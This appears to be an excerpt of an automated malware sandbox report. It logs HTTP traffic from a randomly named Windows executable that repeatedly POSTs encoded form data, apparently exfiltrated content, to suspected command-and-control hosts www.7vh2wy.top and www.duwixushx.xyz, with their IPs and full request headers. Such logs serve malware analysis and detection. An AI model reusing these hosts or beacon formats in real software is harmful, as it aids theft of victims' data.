                                                                  Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</titl
                                                                  Dec 4, 2024 12:52:14.720679045 CET1236INData Raw: 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20
                                                                  Data Ascii: e> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x5
                                                                  Dec 4, 2024 12:52:14.720691919 CET752INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 4f 70 73 2c 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 3e 4e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 6d 6f 73 3c 62 72 3e 65 73 73 61 20 70 c3 a1 67 69 6e 61 21 3c 2f 68 31 3e 0d 0a 20
                                                                  Data Ascii: <h1><strong>Ops,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link v


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.45004120.2.249.7804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:22.645529985 CET745OUTPOST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 58 54 68 6d 6c 37 73 58 77 50 4b 5a 4a 34 68 38 49 47 73 47 2b 59 33 6a 67 69 32 4f 76 62 2b 38 4e 67 6c 4b 33 2b 51 34 31 44 55 62 73 58 43 36 44 34 6d 4f 50 74 6b 33 44 4b 43 62 38 30 46 41 63 68 36 6a 6a 72 74 47 2b 2b 4c 43 43 53 58 7a 66 67 46 61 59 30 52 34 61 47 76 77 59 73 34 73 6c 43 69 33 68 74 61 51 4b 30 65 73 70 76 35 4f 4e 56 36 65 62 38 47 37 34 6d 5a 35 2b 6f 43 5a 50 6e 32 35 30 4d 35 71 42 77 2f 78 57 73 6e 72 73 38 77 78 68 70 76 65 2f 58 45 68 69 32 67 6a 68 78 64 72 50 4f 5a 5a 63 70 47 6a 71 2f 57 47 46 37 76 72 45 41 3d 3d
                                                                  Data Ascii: BTPDLZX=wm6hxzKaeG18XThml7sXwPKZJ4h8IGsG+Y3jgi2Ovb+8NglK3+Q41DUbsXC6D4mOPtk3DKCb80FAch6jjrtG++LCCSXzfgFaY0R4aGvwYs4slCi3htaQK0espv5ONV6eb8G74mZ5+oCZPn250M5qBw/xWsnrs8wxhpve/XEhi2gjhxdrPOZZcpGjq/WGF7vrEA==
                                                                  Dec 4, 2024 12:52:24.186882019 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.45004220.2.249.7804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:25.332273960 CET765OUTPOST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 56 79 78 6d 6d 59 30 58 6e 2f 4b 57 58 6f 68 38 48 6d 73 43 2b 59 72 6a 67 6a 7a 44 75 70 71 38 4e 46 42 4b 74 39 49 34 79 44 55 62 6e 33 43 2f 65 6f 6d 46 50 74 35 43 44 50 36 62 38 30 52 41 63 67 4b 6a 2f 4d 35 5a 2f 75 4c 41 4e 79 58 39 42 51 46 61 59 30 52 34 61 43 50 57 59 76 49 73 6b 79 53 33 67 4d 61 58 55 6b 65 76 67 50 35 4f 61 6c 36 61 62 38 48 65 34 6e 46 66 2b 72 36 5a 50 6a 6d 35 33 64 35 70 49 77 2b 30 62 4d 6d 67 6e 49 39 63 6b 71 62 55 2b 42 51 2b 72 56 67 68 67 33 51 78 65 2f 34 4f 4f 70 69 51 33 34 66 79 49 34 53 69 66 4b 48 30 33 56 43 44 74 44 79 4a 50 4f 47 39 54 48 73 46 54 59 67 3d
                                                                  Data Ascii: BTPDLZX=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDupq8NFBKt9I4yDUbn3C/eomFPt5CDP6b80RAcgKj/M5Z/uLANyX9BQFaY0R4aCPWYvIskyS3gMaXUkevgP5Oal6ab8He4nFf+r6ZPjm53d5pIw+0bMmgnI9ckqbU+BQ+rVghg3Qxe/4OOpiQ34fyI4SifKH03VCDtDyJPOG9THsFTYg=
                                                                  Dec 4, 2024 12:52:26.816433907 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:26 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.45004320.2.249.7804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:28.004697084 CET10847OUTPOST /n7xy/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Origin: http://www.7vh2wy.top
                                                                  Referer: http://www.7vh2wy.top/n7xy/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 56 79 78 6d 6d 59 30 58 6e 2f 4b 57 58 6f 68 38 48 6d 73 43 2b 59 72 6a 67 6a 7a 44 75 6f 53 38 4e 58 4a 4b 33 64 30 34 7a 44 55 62 6b 33 43 2b 65 6f 6d 69 50 74 68 47 44 50 2b 74 38 32 70 41 65 47 32 6a 76 39 35 5a 32 75 4c 41 49 43 58 77 66 67 46 50 59 30 42 30 61 47 6a 57 59 76 49 73 6b 77 4b 33 77 74 61 58 57 6b 65 73 70 76 35 43 4e 56 36 2b 62 38 4f 6a 34 6e 78 70 2b 36 61 5a 4d 43 4b 35 34 4f 52 70 48 77 2b 36 63 4d 6e 67 6e 50 31 66 6b 71 47 72 2b 42 4d 59 72 53 51 68 67 52 35 56 47 38 41 4b 5a 61 4b 4d 6b 61 32 5a 46 72 75 2f 65 35 33 66 30 55 4c 62 33 41 69 79 4a 63 62 45 4a 79 77 6f 51 4d 6d 59 4a 66 41 4c 6f 59 38 48 36 39 50 4d 6f 30 50 57 41 79 67 45 2b 55 74 43 6e 41 6b 77 76 75 36 77 52 42 6e 4c 52 4b 42 69 65 61 78 54 6e 68 74 6c 63 75 55 79 70 63 62 54 53 53 57 5a 57 6e 55 67 57 6f 73 45 37 69 67 65 72 64 30 67 51 44 45 47 6c 78 62 6c 63 43 63 37 41 4c 69 42 50 4f 6d 62 71 4d 49 43 70 36 4b 42 61 6a 41 59 55 4b 72 6d 44 46 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDuoS8NXJK3d04zDUbk3C+eomiPthGDP+t82pAeG2jv95Z2uLAICXwfgFPY0B0aGjWYvIskwK3wtaXWkespv5CNV6+b8Oj4nxp+6aZMCK54ORpHw+6cMngnP1fkqGr+BMYrSQhgR5VG8AKZaKMka2ZFru/e53f0ULb3AiyJcbEJywoQMmYJfALoY8H69PMo0PWAygE+UtCnAkwvu6wRBnLRKBieaxTnhtlcuUypcbTSSWZWnUgWosE7igerd0gQDEGlxblcCc7ALiBPOmbqMICp6KBajAYUKrmDFBp7SjerPJwue4BJpHDnEjn2IxBfFMvsGQXnAYts/lx1cMfM6ouEPrpB6UH73vio5wS9BK2k8It/GRcLChc+eIw+Zfz1fr28eWzVsPmfmb2QB5FsoGfiFYFa5CqY8KYWdhsdve20oMjvsYnRrygpa9qsXTlGbNhHaaHmKdnK07Ecv5dQk2m84yGXLFJKmg3452sgDm6saUAg5zOpUbNfAVps9LAhchK+E6UbuQNIf0lubKQLYeD8nKseaNAlzWthIiZ+/nrCZgY6gme9EApmJ8v212agQ3CZkKJUmPTDxfHUOAV6GYwynqudXoedYq0Xmwv85IiHciwdeMpsrHKycCVTIgR8uCtWID9p+62+ZK3wLihQCSleDFmDAlJLSWNy1hkSZpT/gApdfHp8uTHLmIkjme31iedpeMeZiCT9A2EpMJkfu1L7u9mOtyw9K2aIgiCAReAVixQFRcyP8b6TaJ4Sxuc430CGQA1ktcQPhHk+8NCedz2z5GI/LNnlSiGlTPCaQPATNXMr498Ji0rHQyCf1HxU6hnzggRPVSA1Wkym5kRkx/fw1LtcIVRWJWIyvK9sNz5Zbe93DDT34ojWQs7i6+4v7340PFc5lUsvAZPRDwRLJH8itPPj7tRFR3VzA3IaMwapXj6ZVPjzXi6f+h1Fe+BhFZ43Fnh [TRUNCATED]
                                                                  Dec 4, 2024 12:52:29.556543112 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:29 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.45004420.2.249.7804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:30.669382095 CET481OUTGET /n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.7vh2wy.top
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:52:32.225622892 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:31 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.450045156.251.17.224804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:37.927136898 CET754OUTPOST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 4a 58 47 53 2f 43 2b 52 41 6b 73 43 4e 38 34 66 70 35 6d 34 47 48 56 53 38 57 57 76 4c 34 78 48 37 4d 50 4e 58 46 43 4d 64 75 45 5a 47 39 66 32 6b 70 52 4e 37 6e 32 58 63 6e 62 38 4b 31 66 4a 56 69 35 78 48 73 50 70 35 54 72 77 45 6a 59 68 4d 53 79 50 49 48 6c 4e 42 79 53 52 47 64 4b 70 51 44 6b 39 76 46 57 79 6c 76 75 30 51 79 47 4c 6f 71 6c 79 71 64 71 45 42 68 54 67 34 50 52 41 6d 30 35 64 36 4d 70 5a 72 6a 6d 31 6f 69 45 50 76 44 76 33 44 4a 6d 78 59 43 50 4e 70 59 47 37 49 70 7a 53 43 37 6b 75 4b 53 68 6b 36 42 47 47 58 73 46 7a 62 41 3d 3d
                                                                  Data Ascii: BTPDLZX=eosVKuLBekREJXGS/C+RAksCN84fp5m4GHVS8WWvL4xH7MPNXFCMduEZG9f2kpRN7n2Xcnb8K1fJVi5xHsPp5TrwEjYhMSyPIHlNBySRGdKpQDk9vFWylvu0QyGLoqlyqdqEBhTg4PRAm05d6MpZrjm1oiEPvDv3DJmxYCPNpYG7IpzSC7kuKShk6BGGXsFzbA==
                                                                  Dec 4, 2024 12:52:39.414115906 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:39 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.450046156.251.17.224804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:40.599422932 CET774OUTPOST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 50 45 4f 53 39 68 47 52 42 45 73 42 49 38 34 66 69 5a 6d 38 47 48 70 53 38 58 53 46 4c 4b 56 48 37 73 2f 4e 57 45 43 4d 65 75 45 5a 4f 64 66 2f 35 35 52 38 37 6e 36 31 63 6d 6e 38 4b 78 33 4a 56 6e 64 78 45 64 50 71 36 6a 72 75 64 7a 59 6a 44 79 79 50 49 48 6c 4e 42 79 47 37 47 63 69 70 51 54 30 39 75 68 43 39 72 50 75 33 47 43 47 4c 2f 36 6b 31 71 64 71 79 42 67 50 4f 34 4e 5a 41 6d 31 70 64 39 59 31 61 38 54 6d 2f 73 69 46 48 70 42 36 51 61 35 50 63 48 54 69 70 75 4c 6d 55 41 50 2b 49 54 4b 46 35 59 53 46 58 6e 47 50 79 61 76 34 36 41 42 41 4b 47 56 33 76 2f 4f 70 71 2f 34 6f 71 76 4a 46 66 71 4c 55 3d
                                                                  Data Ascii: BTPDLZX=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKVH7s/NWECMeuEZOdf/55R87n61cmn8Kx3JVndxEdPq6jrudzYjDyyPIHlNByG7GcipQT09uhC9rPu3GCGL/6k1qdqyBgPO4NZAm1pd9Y1a8Tm/siFHpB6Qa5PcHTipuLmUAP+ITKF5YSFXnGPyav46ABAKGV3v/Opq/4oqvJFfqLU=
                                                                  Dec 4, 2024 12:52:42.082777977 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:41 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.450047156.251.17.224804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:52:43.266453028 CET10856OUTPOST /q0vk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.duwixushx.xyz
                                                                  Origin: http://www.duwixushx.xyz
                                                                  Referer: http://www.duwixushx.xyz/q0vk/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 50 45 4f 53 39 68 47 52 42 45 73 42 49 38 34 66 69 5a 6d 38 47 48 70 53 38 58 53 46 4c 4b 64 48 37 66 48 4e 58 6e 71 4d 66 75 45 5a 4e 64 66 79 35 35 52 62 37 6e 79 78 63 6d 72 4b 4b 33 7a 4a 50 46 56 78 46 76 33 71 68 54 72 75 41 6a 59 67 4d 53 79 57 49 48 31 4a 42 79 57 37 47 63 69 70 51 56 51 39 6f 31 57 39 70 50 75 30 51 79 47 48 6f 71 6b 52 71 64 79 69 42 67 4c 77 37 38 35 41 6e 55 5a 64 2f 72 64 61 2b 7a 6d 35 70 69 46 32 70 42 6d 50 61 35 54 2b 48 54 6e 4d 75 4d 57 55 45 61 58 6c 52 2b 42 68 4a 43 73 4f 79 45 66 53 55 2b 6f 2f 4c 41 59 53 43 46 62 30 73 74 64 63 6c 62 31 45 6f 72 52 4f 78 50 55 78 69 4f 6e 49 59 65 62 61 4a 6a 74 36 49 57 39 72 4d 78 31 52 49 7a 42 42 2f 58 5a 6a 64 69 4a 5a 6e 59 59 47 58 48 55 75 62 47 64 74 4d 6b 42 4a 4b 41 61 6a 53 6a 74 53 57 45 79 45 78 73 65 2f 53 46 55 33 51 76 47 30 4b 54 78 4c 66 32 6b 4f 46 73 4c 7a 31 51 61 44 5a 53 43 65 5a 37 50 66 79 53 53 47 62 43 6d 6a 59 51 77 5a 54 6c 71 76 79 46 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKdH7fHNXnqMfuEZNdfy55Rb7nyxcmrKK3zJPFVxFv3qhTruAjYgMSyWIH1JByW7GcipQVQ9o1W9pPu0QyGHoqkRqdyiBgLw785AnUZd/rda+zm5piF2pBmPa5T+HTnMuMWUEaXlR+BhJCsOyEfSU+o/LAYSCFb0stdclb1EorROxPUxiOnIYebaJjt6IW9rMx1RIzBB/XZjdiJZnYYGXHUubGdtMkBJKAajSjtSWEyExse/SFU3QvG0KTxLf2kOFsLz1QaDZSCeZ7PfySSGbCmjYQwZTlqvyFJ//s2l2nSVDIgOgzjIgN5tLcMSrAzCa/BPuS2xMKUwnhx1wm9VNQPdJ7o/+43VKhw7Zfl70/9HSVowXu2CY0tcUZic+LvizTDtfhUv3AmxQHpCAb09X1RYMlqR3fifsnSFB5HgJJCFIclfO2QesRoyg5YcYKRRNegbxZiB7/a54dvoNa/SC6OqV80aDHq+sR5nHE/fu6I5vN3O4198b9FDbhwWW6iNyG5gOcFKHBxRT2xL85/iHZji0FHYBYZirggIgjCJWhX4Hj7zP/6SBbu369Ukjv40AqHG1qsPFOw3JqiiGeoKJ8Mtjsg/OX23ZbUYS99vrzGKBkRkYxrXyuQxdcWiup3WdXAoZ7tr4Hnft+OrH5e8+fz82ONJdXXkVeUu52qXk1pxJYwEFAskB/2CSvsmr2kxvvcYcEwu5q2Ryl0TLOjN44Q3WCRrz9lnhriMqnIo0dMcMlYHNJTu52YMyh23fWzvl8Lqcdj7gMscRojgafJFioxbcKd7N2HSZreqSzPXxCgzRBskMZd9qk0kW8ZphrPV3A4sToI7OCn32G5Na3WiKyTLUH/9nPaRFCnIa7BT/L9Rj1P4XQxBTwvfxgGku0t+Ijmo7y9Bxqz/iNsv6OnDm7N6VljWSiEeKVYr6icrqez0WJ5jqnEvalKO8gAidNZP3el5 [TRUNCATED]
                                                                  Dec 4, 2024 12:52:44.751914024 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:52:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
